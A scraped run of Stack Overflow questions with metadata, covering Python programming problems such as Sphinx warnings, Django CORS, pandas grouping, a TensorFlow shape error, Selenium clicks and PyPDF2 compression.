<p>MIIFGTCCBMCgAwIBAgITbQAABwotIOM7hEGkOwAAAAAHCjAKBggqhkjOPQQDAjBiMRUwEwYKCZImiZPyLGQBGRYFbG9jYWwxEzARBgoJkiaJk/IsZAEZFgNnb3YxFzAVBgoJkiaJk/IsZAEZFgdleHRnYXp0MRswGQYDVQQDExJQRVpFSU5WT0lDRVNDQTItQ0EwHhcNMjMwNTIxMDkxMjE3WhcNMjMwODA4MTIyNjQ2WjBZMQswCQYDVQQGEwJTQTEhMB8GA1UEChMYTW9oYW1tZWQgYWxtYWxraSBjb21wYW55MREwDwYDVQQLEwhtb2hhbW1lZDEUMBIGA1UEAxMLZGV2aWNlIG11c2EwVjAQBgcqhkjOPQIBBgUrgQQACgNCAAStYLyBf9nWo3vWtzUkM2itMt/8euVz4Kao8fqz8SqUKl46RzqyhUUjR4gij3HvA6gBbHT1ai2O5JaAeaj1/4G3o4IDXzCCA1swJwYJKwYBBAGCNxUKBBowGDAKBggrBgEFBQcDAjAKBggrBgEFBQcDAzA8BgkrBgEEAYI3FQcELzAtBiUrBgEEAYI3FQiBhqgdhND7EobtnSSHzvsZ08BVZoGc2C2D5cVdAgFkAgETMIHNBggrBgEFBQcBAQSBwDCBvTCBugYIKwYBBQUHMAKGga1sZGFwOi8vL0NOPVBFWkVJTlZPSUNFU0NBMi1DQSxDTj1BSUEsQ049UHVibGljJTIwS2V5JTIwU2VydmljZXMsQ049U2VydmljZXMsQ049Q29uZmlndXJhdGlvbixEQz1leHRnYXp0LERDPWdvdixEQz1sb2NhbD9jQUNlcnRpZmljYXRlP2Jhc2U/b2JqZWN0Q2xhc3M9Y2VydGlmaWNhdGlvbkF1dGhvcml0eTAdBgNVHQ4EFgQUDQdY1rouelOIOWWyJ8ByNGfyKeQwDgYDVR0PAQH/BAQDAgeAMIHOBgNVHREEgcYwgcOkgcAwgb0xVTBTBgNVBAQMTDEta2FyYWZldGFfcHJncmFtfDItdGhlX2RldmljZV9uYW1lX2lzX2RldmljZSBtdXNhfDMtdGhlX2RldmljZV9udW1iZXJfaXNfNTAxHzAdBgoJkiaJk/IsZAEBDA8zMTExOTAyOTM3MDAwMDMxDTALBgNVBAwMBDExMDAxDjAMBgNVBBoMBWphemFuMSQwIgYDVQQPDBt0ZWNobm9sb2d5IGFuZCBjb25zdWx0YXRpb24wgeEGA1UdHwSB2TCB1jCB06CB0KCBzYaBymxkYXA6Ly8vQ049UEVaRUlOVk9JQ0VTQ0EyLUNBLENOPVBFWkVpbnZvaWNlc2NhMixDTj1DRFAsQ049UHVibGljJTIwS2V5JTIwU2VydmljZXMsQ049U2VydmljZXMsQ049Q29uZmlndXJhdGlvbixEQz1leHRnYXp0LERDPWdvdixEQz1sb2NhbD9jZXJ0aWZpY2F0ZVJldm9jYXRpb25MaXN0P2Jhc2U/b2JqZWN0Q2xhc3M9Y1JMRGlzdHJpYnV0aW9uUG9pbnQwHwYDVR0jBBgwFoAUh6XbAr13zUdvaQF7eC0a9e7HwFEwHQYDVR0lBBYwFAYIKwYBBQUHAwIGCCsGAQUFBwMDMAoGCCqGSM49BAMCA0cAMEQCIHu3KKPhtrWF86EyD1p5GZ0fDzrRIrAVQpO0S4HYZEyfAiArNL/YVPyE+QdNH5AF4CGqIA+wpBYe9vVngMdGlvOwJA==</p>
</blockquote>
<p>i know that i can write it reversed agin but i want it comes correct from python itself.</p>
|
<python><cryptography><ssl-certificate><certificate><x509certificate>
|
2023-05-21 13:28:07
| 1
| 721
|
Mohammed almalki
|
76,300,038
| 5,838,180
|
In python how to cross match sources with a given mask?
|
<p>I have a dataframe that is a catalogue of astronomical sources (galaxies) spread across most of the sky. I also have a <code>.fits</code> binary mask that covers only some parts of the sky (see below). I want to cross-match the catalogue with the mask to get only the galaxies that fall within the mask. How can I do this, e.g. with healpy?</p>
<p><a href="https://i.sstatic.net/686Ys.png" rel="nofollow noreferrer"><img src="https://i.sstatic.net/686Ys.png" alt="enter image description here" /></a></p>
|
<python><pandas><astropy><healpy><cross-match>
|
2023-05-21 13:04:40
| 1
| 2,072
|
NeStack
|
76,299,972
| 12,096,670
|
Accessing a variable of one method inside another method in the same class - Python
|
<p>Let's say I have class, MandM, as indicated below with different methods. I want all the variables in each method to be accessible to all other methods in the class because I may need them in other methods.</p>
<p>So what I am doing is like in the example below, where I call a method within another method and then access the variables I want from that method. For each method, I return its output as a dictionary and then I can refer to that variable by name in another method.</p>
<p>My question is, is there another more efficient way to go about this?</p>
<pre><code>class MandM:
def __init__(self, data, X=2, y=2):
self.data = data
self.X = X
self.y = y
def _ols(self):
y = self.data.iloc[:, :y]
X = self.data.iloc[:, X:]
B = pd.DataFrame(inv(np.dot(X.T, X)) @ np.dot(X.T, y))
B.columns = list(y.columns)
B.index = list(X.columns)
yhat = X @ B
return {"B": B, "yhat": yhat, "y": y, "X": X}
def _sscp(self):
# call ols method
ols = MandM(self.data)._ols()
ybar = pd.DataFrame([ols["y"].mean()] * ols["y"].shape[0])
y_ybar = ols["y"] - ybar
sscp_tot = pd.DataFrame(np.dot(y_ybar.T, y_ybar))
sscp_tot.columns = list(ols["y"].columns)
sscp_tot.index = list(ols["y"].columns)
yhat_ybar = ols["yhat"] - ybar
sscp_reg = pd.DataFrame(np.dot(yhat_ybar.T, yhat_ybar))
sscp_reg.columns = list(ols["y"].columns)
sscp_reg.index = list(ols["y"].columns)
resid = ols["y"] - ols["X"] @ ols["B"]
y_yhat = ols["y"] - ols["yhat"]
sscp_resid = pd.DataFrame(np.dot(y_yhat.T, y_yhat))
sscp_resid.columns = list(ols["y"].columns)
sscp_resid.index = list(ols["y"].columns)
return {"sscp_tot": sscp_tot, "sscp_reg": sscp_reg,
"resid": resid, "sscp_resid": sscp_resid}
</code></pre>
|
<python><class><methods>
|
2023-05-21 12:46:13
| 1
| 845
|
GSA
|
76,299,903
| 2,469,105
|
Using Python Sphinx getting WARNING: duplicate object description of myproject / use :noindex: for one of them
|
<p>I'm using Sphinx to create HTML documentation for a Python project.</p>
<p>TL;DR I cannot get rid of this warning message.</p>
<pre><code>WARNING: duplicate object description of myproject, other instance in class-stubs/Bar, use :noindex: for one of them
</code></pre>
<p>I want the index page to look like this:</p>
<p><a href="https://i.imgur.com/5rczGzQ.png" rel="nofollow noreferrer">Index page</a></p>
<p>with a separate link for each class in the project.</p>
<p>What I have actually works and gives me the result I want, but I cannot get rid of the warning messages.
None of the existing pages I've seen about the "duplicate object description" give me a solution.</p>
<p>All the Python code is in one file <code>myproject.py</code>. There is a separate RST file for each of the three classes in the subdirectory class-stubs.</p>
<pre><code>C:\...\DOCTEST
| CHANGELOG.rst
| conf.py
| index.rst
| make.bat
| Makefile
| myproject.py
| README.rst
| setup.py
|
+---class-stubs
Bar.rst
Baz.rst
Foo.rst
</code></pre>
<p>The Python code in <code>myproject.py</code> is:</p>
<pre><code>"""My Super Python Utility"""
__version__ = "1.2.3.0000"
__all__ = (
'Foo', 'Bar', 'Baz'
)
class Foo:
"""Foo utilities."""
@staticmethod
def spam(filename):
"""Perform the spam operation.
# -[cut]-
"""
return "spam, spam, spam"
class Bar:
"""Bar utilities."""
# -[cut]-
class Baz:
"""Baz utilities."""
# -[cut]-
</code></pre>
<p>We use Google style docstrings and the <code>sphinx.ext.napoleon</code> extension.</p>
<p>index.rst is as follows:</p>
<pre><code>.. My Super Python Project documentation master file
My Super Python Documentation
========================================
Contents:
.. toctree::
:maxdepth: 1
class-stubs/Foo.rst
class-stubs/Bar.rst
class-stubs/Baz.rst
README.rst
CHANGELOG.rst
Indices and tables
==================
* :ref:`genindex`
* :ref:`search`
~
</code></pre>
<p>Each class file in class-stubs is of the form similar to <code>Foo.rst</code></p>
<pre><code>Foo class
==========
.. automodule:: myproject
:members: Foo
~
</code></pre>
<p>The files <code>Bar.rst</code> and <code>Baz.rst</code> are similar.</p>
<p>On compiling with <code>make html</code> we get these errors:</p>
<pre><code>Running Sphinx v5.3.0
...
C:\...\doctest\myproject.py:docstring of myproject:1: WARNING: duplicate object description of myproject, other instance in class-stubs/Bar, use :noindex: for one of them
C:\...\doctest\myproject.py:docstring of myproject:1: WARNING: duplicate object description of myproject, other instance in class-stubs/Baz, use :noindex: for one of them
</code></pre>
<p>It looks like it is objecting to the <code>.. automodule:: myproject</code> statement in all but the first of the class RST files.</p>
<p>You can remove the warnings by adding <code>:noindex:</code> for each class RST file like this</p>
<pre><code>Foo class
==========
.. automodule:: myproject
:members: Foo
:noindex:
</code></pre>
<p>but this removes the URL links to the methods in the class, which is not what I want.</p>
<p>Can anyone suggest a solution? (NOTE: all the classes are deliberately in the one source code module, so please do not suggest separating them.) I should emphasise that this actually works, I just want to get rid of those warning messages.</p>
<p>UPDATE: of course you get rid of those messages by adding to <code>conf.py</code></p>
<pre><code>suppress_warnings = 'autosectionlabel.*'
</code></pre>
<p>but that doesn't solve the underlying problem.</p>
<p>UPDATE: @mzjn Change automodule to autoclass in each of the stub files like this:</p>
<pre><code>Bar class
============
.. autoclass:: myproject
:members: Bar
</code></pre>
<p>This gives a warning:</p>
<pre><code>WARNING: don't know which module to import for autodocumenting
'myproject' (try placing a "module" or "currentmodule" directive in
the document, or giving an explicit module name)
</code></pre>
<p>and the page for each class just has the title but no content.</p>
<p>If I set just one of the classes to have automodule (eg Bar.rst) and the other two with autoclass, then there is no warning and the Bar page is correct BUT the other class pages have no content.</p>
|
<python><python-sphinx><autodoc>
|
2023-05-21 12:26:55
| 2
| 951
|
David I
|
76,299,315
| 11,801,298
|
Set place of each bar in matplotlib
|
<p>This is working code. It creates bars of specific length.</p>
<pre><code># creating the dataset
data = {'C':20, 'C++':15, 'Java':30,
'Python':35}
courses = list(data.keys())
values = list(data.values())
fig = plt.figure(figsize = (10, 5))
# creating the bar plot
plt.bar(courses, values, color ='maroon',
width = 0.4)
plt.xlabel("Courses offered")
plt.ylabel("No. of students enrolled")
plt.title("Students enrolled in different courses")
plt.show()
</code></pre>
<p><a href="https://i.sstatic.net/ey2IG.jpg" rel="nofollow noreferrer"><img src="https://i.sstatic.net/ey2IG.jpg" alt="enter image description here" /></a></p>
<p>But I need more options. In future I will create animation of these bars. They will move left and right. So I want to set place of bar on x axis.
How can I do it?</p>
<p>My desired result looks like this (when I set place by my own)</p>
<p><a href="https://i.sstatic.net/edbWC.jpg" rel="nofollow noreferrer"><img src="https://i.sstatic.net/edbWC.jpg" alt="enter image description here" /></a></p>
|
<python><matplotlib>
|
2023-05-21 10:02:48
| 2
| 877
|
Igor K.
|
76,299,098
| 14,950,385
|
Is it possible to implement a provider method on top of python?
|
<p>I'm trying to control my laptop fan speed using WMI in python.</p>
<p>This is my python code:</p>
<pre class="lang-py prettyprint-override"><code>import wmi
c = wmi.WMI ()
cim_fan = c.CIM_Fan()
fan_speed = 4000
cim_fan[0].SetSpeed(fan_speed)
</code></pre>
<p>But it throws this error:</p>
<pre><code>Traceback (most recent call last):
File "C:\Users\AliEnt\Desktop\Athena Codes\control_fan\main.py", line 7, in <module>
cim_fan[0].SetSpeed(fan_speed)
File "C:\Users\AliEnt\AppData\Roaming\Python\Python39\site-packages\wmi.py", line 473, in __call__
handle_com_error()
File "C:\Users\AliEnt\AppData\Roaming\Python\Python39\site-packages\wmi.py", line 258, in handle_com_error
raise klass(com_error=err)
wmi.x_wmi: <x_wmi: Unexpected COM Error (-2147352567, 'Exception occurred.', (0, 'SWbemObjectEx', 'This method is not implemented in any class ', None, 0, -2147217323), None)>
</code></pre>
<p>Then I took a closer look at the <a href="https://learn.microsoft.com/en-us/windows/win32/cimwin32prov/cim-fan#methods" rel="nofollow noreferrer">CIM_Fan class documentation</a> and saw this:</p>
<div class="s-table-container">
<table class="s-table">
<thead>
<tr>
<th>Method</th>
<th>Description</th>
</tr>
</thead>
<tbody>
<tr>
<td>Reset</td>
<td>Requests a reset of the logical device. <strong>Not implemented by WMI</strong>.</td>
</tr>
<tr>
<td>SetPowerState</td>
<td>Defines the desired power state for a logical device and when a device should be put into that state. <strong>Not implemented by WMI</strong>.</td>
</tr>
<tr>
<td>SetSpeed</td>
<td>Sets the fan speed. <strong>Not implemented by WMI</strong>.</td>
</tr>
</tbody>
</table>
</div>
<p><a href="https://learn.microsoft.com/en-us/windows/win32/cimwin32prov/setspeed-method-in-class-cim-fan#remarks" rel="nofollow noreferrer">Here</a> it is said that I have to implement it on my own provider. I don't understand what does it mean by saying <em>provider</em>.</p>
<p>I'm familiar with C++ but I'm pretty new with Microsoft APIs. So I prefer to do it by using python instead of compiling a C++ program. Or at least with a minimum C++ code and a wrapper.</p>
|
<python><winapi><wmi><cim>
|
2023-05-21 09:08:10
| 0
| 2,695
|
Ali Ent
|
76,298,985
| 12,285,101
|
Reduce pandas data frame to have one column with list of repeating values
|
<p>I have the following dataframe:</p>
<pre><code>index name path
0 Dina "gs://my_bucket/folder1/img1.png"
1 Dina "gs://my_bucket/folder1/img2.png"
2 Lane "gs://my_bucket/folder1/img3.png"
3 Bari "gs://my_bucket/folder1/img4.png"
4 Andrew "gs://my_bucket/folder1/img5.png"
5 Andrew "gs://my_bucket/folder1/img6.png"
6 Andrew "gs://my_bucket/folder1/img7.png"
7 Beti "gs://my_bucket/folder1/img7.png"
8 Ladin "gs://my_bucket/folder1/img5.png"
...
</code></pre>
<p>I would like to get new dataframe which will have the unique names appears only once, and the path column will be list with the matching paths. The output should look like this:</p>
<pre><code>index name path
0 Dina ["gs://my_bucket/folder1/img1.png","gs://my_bucket/folder1/img2.png"]
1 Lane ["gs://my_bucket/folder1/img3.png"]
2 Bari ["gs://my_bucket/folder1/img4.png"]
3 Andrew ["gs://my_bucket/folder1/img5.png","gs://my_bucket/folder1/img6.png","gs://my_bucket/folder1/img7.png"]
4 Beti ["gs://my_bucket/folder1/img7.png"]
5 Ladin ["gs://my_bucket/folder1/img5.png"]
...
</code></pre>
<p>The result should have number of rows equal to unique names in the dataframe.
At the moment I'm using something I did with chatgpt, but it used function that I don't understand why is it used and also it duplicates the names of the rows, so if I know I suppose to have 842 unique names, I get 992 ...</p>
<p>This is chatGPT solution:</p>
<pre><code># Define a custom aggregation function to combine links as a list
def combine_links(links):
return list(set(links)) # Convert links to a list and remove duplicates
# Group the GeoDataFrame by 'name' and 'dili' and aggregate the 'link' column
result = df.groupby(['name'))['path'].agg(combine_links).reset_index()
</code></pre>
<p>My goal is to find a solution the gives me in the end the right number of rows, which is number of unique names.</p>
|
<python><pandas><aggregate>
|
2023-05-21 08:37:50
| 2
| 1,592
|
Reut
|
76,298,900
| 3,646,265
|
Django CORS issue with VUE
|
<p>I am running python 3.11.3 with the following packages:</p>
<pre><code>Package Version
------------------- -------
asgiref 3.6.0
Django 4.2.1
django-cors-headers 4.0.0
pip 23.1.2
setuptools 67.6.1
sqlparse 0.4.4
whitenoise 6.4.0
</code></pre>
<p>I am trying to enable <strong>CORS</strong> for <strong>Vue</strong>, but I keep running into the following error:</p>
<pre><code>Forbidden (Origin checking failed - http://127.0.0.1:8090 does not match any
trusted origins.): /api/login/
</code></pre>
<p>In settings.py, I have:</p>
<pre><code>CORS_ALLOW_ALL_ORIGINS = True
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'reports',
'corsheaders',
]
MIDDLEWARE = [
'corsheaders.middleware.CorsMiddleware',
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'whitenoise.middleware.WhiteNoiseMiddleware',
]
</code></pre>
<p>Browser response header</p>
<pre><code>access-control-allow-origin: http://127.0.0.1:8090
Content-Length: 2569
Content-Type: text/html; charset=utf-8
Cross-Origin-Opener-Policy: same-origin
Date: Sun, 21 May 2023 08:13:21 GMT
Referrer-Policy: same-origin
Server: WSGIServer/0.2 CPython/3.11.3
Vary: origin
X-Content-Type-Options: nosniff
X-Frame-Options: DENY
</code></pre>
<p>Request header</p>
<pre><code>Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9,es;q=0.8
Connection: keep-alive
Content-Length: 40
Content-Type: application/json
DNT: 1
Host: 127.0.0.1:8000
Origin: http://127.0.0.1:8090
Referer: http://127.0.0.1:8090/
sec-ch-ua: "Chromium";v="112", "Google Chrome";v="112", "Not:A-Brand";v="99"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "macOS"
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-site
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
</code></pre>
<p>Do you have any idea what I am doing wrong? Any help would be appreciated.</p>
<p>Thanks,</p>
|
<python><django><vue.js><cors>
|
2023-05-21 08:12:57
| 0
| 383
|
developthou
|
76,298,596
| 2,000,548
|
How to delete Prefect blocks in Python?
|
<p>I am using Prefect 2.</p>
<p>I am able to create Prefect blocks, for example, AWS Credentials and Kubernetes Job blocks by</p>
<pre class="lang-py prettyprint-override"><code>from prefect_aws import AwsCredentials
from prefect.infrastructure import KubernetesJob
async def create():
await AwsCredentials(
aws_access_key_id="xxx",
aws_secret_access_key="xxx",
region_name="us-west-2",
).save(f"my-aws-credentials-block", overwrite=True)
await KubernetesJob(
image=f"my-image:latest",
image_pull_policy="Always",
).save(f"my-kubernetes-job-block", overwrite=True)
</code></pre>
<p>Now I am hoping to delete them in Python.</p>
<p>I was trying to find how to at</p>
<ul>
<li><a href="https://prefecthq.github.io/prefect-kubernetes/" rel="nofollow noreferrer">https://prefecthq.github.io/prefect-kubernetes/</a></li>
<li><a href="https://prefecthq.github.io/prefect-aws/" rel="nofollow noreferrer">https://prefecthq.github.io/prefect-aws/</a></li>
</ul>
<p>but didn't find any info.</p>
<p>Is there a way to delete Prefect blocks by Python code? Thanks!</p>
|
<python><prefect>
|
2023-05-21 06:34:12
| 2
| 50,638
|
Hongbo Miao
|
76,298,402
| 7,987,987
|
how to get league id for players based on data in matches column
|
<p>I have 2 dataframes for soccer info:</p>
<ul>
<li><code>matches</code>: info on individual matches. Contains columns for the ID of the league in which the match was played, the date the match was played, the season the match was played, and has 22 columns of player IDs (<code>home_player_1</code>, <code>home_player_2</code>, ... <code>home_player_11</code>, <code>away_player_1</code>, <code>away_player_2</code>, ... <code>away_player11</code>) for each of the players that started the match.</li>
<li><code>player_attributes</code>: info on the attributes of individual players recorded over time. Each player has multiple recordings each season for many seasons, so each row has a <code>date</code> column that indicates when the data in that row was recorded. This is important because it means the player ID column is not a unique index.</li>
</ul>
<p>I want to add a <code>league_id</code> column to the player attributes dataframe so that I know which league the player was in at the time the specific attributes in that row were recorded.</p>
<p>What I've done so far:</p>
<ul>
<li>added a <code>season</code> column to the player attributes df based on the value in the <code>date</code> column for each row</li>
<li>created a new <code>player_matches</code> df with columns <code>match_id</code>, <code>player_id</code>, <code>season</code>, <code>league_id</code>. Each match id in this df shows up in 22 rows (one for the id of each player that started the match).</li>
</ul>
<p>My goal with this <code>player_matches</code> df is to use it to find the league id for each row in the player attributes table by matching the player id and season to a <code>player_matches</code> row and then using the value of league id for that row. The problem is that I haven't found an efficient way to do this. The player attributes df contains 121k rows and the player matches table contains 321k rows so normal easy indexing/masking/merging doesn't work. I tried using <code>apply</code> like this:</p>
<pre class="lang-py prettyprint-override"><code>def get_league_id(row):
player_api_id = row['player_api_id']
season = row['season']
match_row = player_matches[(player_matches['player_api_id'] == player_api_id) & (player_matches['season'] == season)].iloc[0]
league_id = match_row['league_id']
return league_id
player_attributes.apply(get_league_id, axis=1)
</code></pre>
<p>However, this gives the error: "IndexError: single positional indexer is out-of-bounds". I noticed that the error doesn't happen until the 13th row, so basically this code <code>player_attributes.head(12).apply(get_league_id, axis=1)</code> works.</p>
<p>Any idea why this error is occurring? Or do you have an alternate method that will work?</p>
|
<python><pandas><dataframe>
|
2023-05-21 05:22:25
| 1
| 936
|
Uche Ozoemena
|
76,298,170
| 8,616,751
|
Shape of predictors for geospatial 3D CNN
|
<p>I can't get my mind around how to build a 3D CNN in python to account for spatial features. I have one target variable (binary classification) and say three predictor variables (continuous). All variables have 35 timesteps, 137 latitudes and 181 longitudes. I made a dummy script</p>
<pre><code>import numpy as np
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Conv3D, MaxPooling3D, Flatten, Dense
### Generate dummy variables
np.random.seed(42)
predictors = np.random.rand(35, 137, 181, 3)
target = np.random.rand(35, 137, 181)
model = Sequential()
model.add(Conv3D(32,
kernel_size=(3, 3, 3),
activation='relu',
input_shape=(35, 181, 137, 3)))
model.add(MaxPooling3D(pool_size=(2, 2, 2)))
model.add(Flatten())
model.add(Dense(64, activation='relu'))
model.add(Dense(1))
model.compile(optimizer='adam', loss='mean_squared_error')
model.fit(predictors,
target,
epochs=10,
batch_size=32,
validation_split=0.2)
</code></pre>
<p>but when I try to fit my model, I get the error</p>
<pre><code>ValueError: Input 0 of layer "sequential" is incompatible with the layer: expected shape=(None, 35, 181, 137, 3), found shape=(None, 181, 137, 3)
</code></pre>
<p>Why this is happening? I know this a noob question, but if someone could help me solve this and explain what is going on that would be great! Eventually the model should be able to predict along the time axis, i.e. based on the 3 predictor variables.</p>
|
<python><keras><conv-neural-network>
|
2023-05-21 03:26:11
| 1
| 303
|
scriptgirl_3000
|
76,298,101
| 19,270,168
|
Cannot create a client socket with a PROTOCOL_TLS_SERVER context while trying to rank a player in-group
|
<pre class="lang-py prettyprint-override"><code>import robloxapi
async def grouprank(userId, rankName):
# omitted rank-name to role id mapping
rankId = dic[rankName]
client = robloxapi.Client(cookie=NOT_STUPID_ENOUGH_TO_DISCLOSE)
grp = await client.get_group(32409863)
await robloxapi.client.Group.set_rank_by_id(grp, userId, rankId)
import asyncio
lp = asyncio.new_event_loop()
lp.run_until_complete(grouprank(2315210162, "Recruit"))
</code></pre>
<p>The code above throws the following error:
ssl.SSLError: Cannot create a client socket with a PROTOCOL_TLS_SERVER context (_ssl.c:795)</p>
<p>This code is mainly to rank a player to another rank in a roblox group using a bot</p>
|
<python><python-3.x><roblox>
|
2023-05-21 02:52:20
| 2
| 1,196
|
openwld
|
76,298,066
| 11,885,185
|
How to solve broadcast issue in Deep Learning?
|
<p>I have an issue with my code, at broadcasting.</p>
<p>I got this error at Step 8:</p>
<pre><code>ValueError: non-broadcastable output operand with shape (1062433,1) doesn't match
the broadcast shape (1062433,2)
</code></pre>
<p>and I have this code:</p>
<p>Step 1: Read the data</p>
<pre><code>df = pd.read_csv('file1.csv')
</code></pre>
<p>Step 2: Split the data into training and testing sets</p>
<pre><code>train_end_date = df['Date'].max() - pd.DateOffset(years=5)
train_data = df[df['Date'] <= train_end_date]
test_data = df[df['Date'] > train_end_date]
</code></pre>
<p>Step 3: Normalize the data</p>
<pre><code>scaler = MinMaxScaler()
cols_to_scale = ['feature1', 'feature2']
train_data_scaled = scaler.fit_transform(train_data[cols_to_scale])
test_data_scaled = scaler.transform(test_data[cols_to_scale])
print("Step 3")
print("train_data_scaled", train_data_scaled.shape)
print("test_data_scaled", test_data_scaled.shape)
</code></pre>
<p>Step 4: Prepare the input sequences and labels</p>
<pre><code>def create_sequences(data, sequence_length):
X, y = [], []
for i in range(len(data) - sequence_length):
X.append(data[i:i+sequence_length, :])
y.append(data[i+sequence_length, 0])
return np.array(X), np.array(y)
sequence_length = 10
X_train, y_train = create_sequences(train_data_scaled, sequence_length)
X_test, y_test = create_sequences(test_data_scaled, sequence_length)
print("Step 4")
print("X_train", X_train.shape)
print("y_train", y_train.shape)
print("X_test", X_test.shape)
print("y_test", y_test.shape)
</code></pre>
<p>Step 5: Build the Transformer model</p>
<pre><code>input_shape = (sequence_length, X_train.shape[2])
inputs = Input(shape=input_shape)
x = inputs
num_layers = 2
d_model = 32
num_heads = 4
dff = 64
dropout_rate = 0.1
for _ in range(num_layers):
x = MultiHeadAttention(num_heads=num_heads, key_dim=d_model)(x, x)
x = Dropout(dropout_rate)(x)
x = LayerNormalization(epsilon=1e-6)(x)
x = tf.keras.layers.GlobalAveragePooling1D()(x)
x = Dense(units=1)(x)
model = Model(inputs=inputs, outputs=x)
</code></pre>
<p>Step 6: Compile and train the model</p>
<pre><code>model.compile(optimizer='adam', loss='mean_squared_error', metrics=['mae'])
model.fit(X_train, y_train, epochs=1, batch_size=32)
</code></pre>
<p>Step 7: Evaluate the model</p>
<pre><code>train_predictions = model.predict(X_train)
test_predictions = model.predict(X_test)
print("Step 7")
print("train_predictions at evaluation", train_predictions.shape)
print("test_predictions at evaluation", test_predictions.shape)
</code></pre>
<p>Step 8: Inverse transform the predictions to obtain the actual values - HERE IS THE ERROR</p>
<pre><code>train_predictions = scaler.inverse_transform(train_predictions.reshape(-1, 1)).flatten()
test_predictions = scaler.inverse_transform(test_predictions.reshape(-1, 1)).flatten()
print("Step 8")
print("train_predictions after inversion", train_predictions.shape)
print("test_predictions after inversion", test_predictions.shape)
</code></pre>
<p>As asked in the comments' section, I tried to print the most significant parts of the code in order to find out where it cracks. Therefore, these are the results:</p>
<pre><code>Step 3
train_data_scaled (1062443, 2)
test_data_scaled (308138, 2)
Step 4
X_train (1062433, 10, 2)
y_train (1062433,)
X_test (308128, 10, 2)
y_test (308128,)
33202/33202 [==============================] - 431s 13ms/step - loss: 2.1277e-05 - mae: 4.1088e-04
33202/33202 [==============================] - 203s 6ms/step
9629/9629 [==============================] - 55s 6ms/step
Step 7
train_predictions at evaluation (1062433, 1)
test_predictions at evaluation (308128, 1)
</code></pre>
<p>It definitely changed when training, but how could I solve this issue?</p>
<p>Thanks so much.
:D</p>
|
<python><tensorflow><scikit-learn><deep-learning>
|
2023-05-21 02:33:18
| 1
| 612
|
Oliver
|
76,297,961
| 6,056,160
|
Using Selenium to click a input type submit button
|
<p>Trying to click this</p>
<pre><code><input type="submit" value="Log In" class="btn btn-lg btn-primary btn-block">
</code></pre>
<p>I have tried</p>
<pre><code>driver.find_element("class", "btn").click()
driver.find_element("class", "btn btn-lg btn-primary btn-block").click()
driver.find_element("value", "Log In").click()
</code></pre>
<p>But all give error</p>
<pre><code>InvalidArgumentException: Message: invalid argument: invalid locator
</code></pre>
<p>How can I click on this?</p>
<p>EDIT:</p>
<p>now ive tried</p>
<pre><code>driver.find_element(By.CLASS_NAME, "btn btn-lg btn-primary btn-block").click()
</code></pre>
<p>but get error</p>
<pre><code>NoSuchElementException: Message: no such element: Unable to locate element: {"method":"css selector","selector":".btn btn-lg btn-primary btn-block"}
</code></pre>
|
<python><selenium-webdriver><input><click><submit>
|
2023-05-21 01:39:04
| 1
| 5,241
|
Runner Bean
|
76,297,916
| 5,431,734
|
compare operation in a pandas rolling window
|
<p>I want to make a rolling window and compare the elements in this window with the most recent one. In fact I want to subtrack the last value from all the the others. For example if we have the dataframe</p>
<pre><code>df = pd.DataFrame([
[2, 3, 5, 7,],
[8, 3, 6, 1],
[1, 5, 9, 13],
[7, 3, 2, 7],
[12, 4, 1, 0]
])
</code></pre>
<p>I would like to make a rolling window of length 4, hence in this particular case, the first window will be [2, 8, 1, 7]. Now the last element (which is 7) is greater than 2 and 1 but smaller than 8, hence the output of the operation will be -1+1-1 = -1 (-1 if greater, +1 if smaller. If equal, it doesnt really matter but lets we give a +1). Similarly for the next rolling window. Now, 12 is greater than all the values in the the window, therefore the operation will return -3.</p>
<p>The ideal output finally will be:</p>
<pre><code>[NaN, NaN, NaN, NaN]
[NaN, NaN, NaN, NaN]
[NaN, NaN, NaN, NaN]
[-1, 3, 3, 1 ]
[ -3, -1 3, 3 ]
</code></pre>
<p>I tried with <code>pd.rolling().apply()</code>, also with <code>df.shift</code> but couldnt get anywhere</p>
|
<python><pandas>
|
2023-05-21 01:11:35
| 2
| 3,725
|
Aenaon
|
76,297,879
| 4,115,031
|
Benchmarks of FastAPI vs async Flask?
|
<p>I'm a developer without an interest in benchmarking and I'm trying to decide whether I should use Flask or FastAPI to build some Python/Vue projects. I'm seeing stuff online about how FastAPI was faster than Flask because Flask was single-threaded or something like that, whereas FastAPI was async, but apparently more-recently Flask added async routes, and so now I'm wondering if FastAPI is still(?) faster than Flask.</p>
<p>Has anyone done benchmarking tests comparing FastAPI to Flask async routes? I can't find any when I search Google.</p>
|
<python><flask><fastapi>
|
2023-05-21 00:53:26
| 1
| 12,570
|
Nathan Wailes
|
76,297,824
| 2,769,240
|
PyPDF2 unable to compress pdf
|
<p>I want to show an embed pdf on streamlit app which has a limitation of <2MB pdf size to be displayed.</p>
<p>So I am trying to compress the pdf file which a user uploads via st.file_uploader on streamit app using PyPDF2 package. Here's the code I used:</p>
<pre><code>from PyPDF2 import PdfReader, PdfWriter
from io import BytesIO
def compress_pdf(pdf_file, target_size):
# Load PDF using PyPDF2
pdf_reader = PdfReader(pdf_file)
# Compress PDF using PyPDF2
output_pdf = BytesIO()
pdf_writer = PdfWriter()
for page in pdf_reader.pages:
page.compress_content_streams() # This is CPU intensive!
pdf_writer.add_page(page)
# Get the compressed PDF bytes
pdf_writer.write(output_pdf)
compressed_pdf_bytes = output_pdf.getvalue()
print(len(compressed_pdf_bytes)) # Check output of compressed pdf
return compressed_pdf_bytes
</code></pre>
<p>The above function takes in the file uploaded by the user on streamlit as below:</p>
<pre><code>uploaded_file = st.sidebar.file_uploader("Upload a file", key= "uploaded_file")
print(st.session_state.uploaded_file)
if uploaded_file is not None:
compressed_pdf_bytes= compress_pdf(uploaded_file, 2000000)
</code></pre>
